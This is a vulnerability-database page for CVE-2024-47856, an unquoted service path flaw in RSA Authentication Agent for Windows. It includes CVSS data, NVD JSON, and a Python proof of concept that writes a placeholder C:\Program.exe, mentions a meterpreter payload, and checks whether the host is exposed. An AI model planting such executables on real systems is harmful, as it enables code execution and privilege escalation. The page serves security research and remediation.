Security Vulnerability Report
CVE-2024-47856 CVSS 9.8 CRITICAL

CVE-2024-47856

Published: 2025-11-24 22:15:47
Last Modified: 2025-12-30 17:25:33

Description

In RSA Authentication Agent before 7.4.7, service paths and shortcut paths may be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks. An adversary can place an executable in a higher-level directory of the path, and Windows will resolve that executable instead of the intended executable.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rsa:authentication_agent_for_windows:*:*:*:*:*:*:*:* - VULNERABLE
RSA Authentication Agent for Microsoft Windows < 7.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2024-47856 Path Interception PoC
# Target: RSA Authentication Agent < 7.4.7
# Attack Vector: Place malicious executable in parent directory
import os


def create_malicious_executable():
    """
    Create the file that an unquoted service path would resolve to.
    Only a placeholder file is written here; it is not a working payload.
    """
    # Executable name that matches the first space-delimited component of
    # an unquoted "C:\Program Files\..." service path
    malicious_exe_path = r"C:\Program.exe"
    # Placeholder bytes for demonstration only (not a valid PE image).
    # In real attack, this would be a meterpreter or similar payload
    malicious_code = b'MZ' + b'\x00' * 100
    with open(malicious_exe_path, 'wb') as f:
        f.write(malicious_code)
    return malicious_exe_path


def check_vulnerability():
    """
    Check if the system is vulnerable to CVE-2024-47856.
    Note: this is a presence check only; it does not read the installed
    version, so a patched (>= 7.4.7) install is also reported as found.
    """
    # Check if RSA Authentication Agent is installed
    rsa_paths = [
        r"C:\Program Files\RSA\Authentication Agent\bin\AuBatch.exe",
        r"C:\Program Files\RSA\Authentication Agent\bin\SecurIDLogon.dll",
        r"C:\Program Files (x86)\RSA\Authentication Agent\bin\AuBatch.exe",
    ]
    vulnerable = False
    for path in rsa_paths:
        if os.path.exists(path):
            print(f"[+] RSA Authentication Agent found at: {path}")
            vulnerable = True

    # Check if the higher-level directory is writable
    if vulnerable:
        # If C:\ is writable, Program.exe can be placed there.
        # Caveat: on Windows os.access() only consults the read-only
        # attribute, not the ACL, so this check can give false positives.
        if os.access("C:\\", os.W_OK):
            print("[!] System is VULNERABLE - parent directory is writable")
            print("[!] Attacker can place malicious Program.exe in C:\\")
        else:
            print("[-] System may not be vulnerable - insufficient permissions")
    return vulnerable


if __name__ == "__main__":
    print("CVE-2024-47856 Path Interception Vulnerability Checker")
    print("=" * 60)
    check_vulnerability()
    print("\nRemediation: Upgrade to RSA Authentication Agent 7.4.7 or later")
```

References

https://community.rsa.com/s/article/RSA-2024-13-RSA-Authentication-Agent-for-Microsoft-Windows-Security-Update (Vendor Advisory)
https://community.rsa.com/s/product-download/a9G4u000000mCOYEAU/rsa-authentication-agent-747-for-microsoft-windows (Permissions Required)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2024-47856",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-24T22:15:46.820",
    "lastModified": "2025-12-30T17:25:32.607",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In RSA Authentication Agent before 7.4.7, service paths and shortcut paths may be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks. An adversary can place an executable in a higher-level directory of the path, and Windows will resolve that executable instead of the intended executable."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-23"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:rsa:authentication_agent_for_windows:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.4.7",
                "matchCriteriaId": "F35038B7-C8FD-4AFF-8D42-D59061A370D8"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://community.rsa.com/s/article/RSA-2024-13-RSA-Authentication-Agent-for-Microsoft-Windows-Security-Update",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://community.rsa.com/s/product-download/a9G4u000000mCOYEAU/rsa-authentication-agent-747-for-microsoft-windows",
        "source": "[email protected]",
        "tags": ["Permissions Required"]
      }
    ]
  }
}
```